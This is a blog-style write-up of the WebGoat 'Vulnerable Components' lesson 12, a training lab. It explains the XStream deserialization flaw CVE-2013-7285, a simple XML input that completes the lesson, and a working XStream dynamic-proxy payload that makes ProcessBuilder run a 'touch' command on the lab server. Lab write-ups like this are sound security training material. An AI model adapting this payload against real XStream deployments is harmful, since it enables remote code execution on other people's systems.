WebGoat Vulnerable Components 12

WebGoat Vulnerable Components lesson 12

This lesson is about the exploitation of XStream vulnerability CVE-2013–7285 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285

CVE-2013–7285 is a Remote Code Execution due to the fact that XStream allows the creation of arbitrary Java Objects, thus it is possible to create a java.lang.ProcessBuilder and execute a command as the current Java application

But unfortunately getting this lesson completed and exploiting CVE-2013–7285 are not the same thing

1 — Getting the lesson completed

After reading WebGoat GitHub sources

• https://github.com/WebGoat/WebGoat/blob/develop/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLesson.java

Some more reading of all I can find on the web

• https://github.com/WebGoat/WebGoat/wiki/(Almost)-Fully-Documented-Solution-(en)#sql-injection-mitigation
• https://github.com/WebGoat/WebGoat/wiki/Main-Exploits
• https://gist.github.com/DinisCruz/8132915
• https://web.archive.org/web/20190718132219/http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
• https://web.archive.org/web/20150512232424/https://gist.github.com/DinisCruz/8077118
• https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=62fc613de0d55235e7c58edfa054260d
• https://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
• https://book.hacktricks.xyz/pentesting-web/deserialization

and finally watching this youtube video from “PenTester 123"

• https://www.youtube.com/watch?v=iWcRR2WcBFU

while trying various payloads, I had serious doubts about the consistence between WebGoat GitHub sources and what was actually running on my WebGoat instance

So I get a hold of Java Decompiler http://java-decompiler.github.io/

Copying webgoat.jar from docker

Copied the WebGoat jar from the server currently running the docker container

webgoat.jar on Java Decompiler

Opened it with Java Decompiler

Here it’s clear that to make the lesson marked as completed it is sufficient just making the ConversionException message contain the string “Integer”

So by putting this payload in the text area, the lesson is completed

<contact>
 <Integer>5</Integer>
</contact>

2 — Exploiting CVE-2013–7285 on WebGoat Vulnerable Components lesson

I based my solution of this blog post

RCE via XStream object deserialization

and the XML payload present in the “Increasing the success likelihood” section

To get some sort of proof that the solution was working, I wanted to create a file but all input/output redirections were not working

I added a second <string> xml element in the command section, by doing so I created a “xyz” file on the home directory of the “webgoat” user running

Here is my payload

<sorted-set>
  <string>foo</string>
  <dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
      <target class="java.lang.ProcessBuilder">
        <command>
          <string>touch</string><string>xyz</string>
        </command>
      </target>
      <action>start</action>
    </handler>
  </dynamic-proxy>
</sorted-set>

And here is what happens on the docker WebGoat machine before and after running the XML payload, the payload has been put and executed on the lesson page in between of the two “ls” commands

A wild xyz file appears

This concludes WebGoat Vulnerable Components 12

I hope you liked it.

PVXs — https://twitter.com/pivixih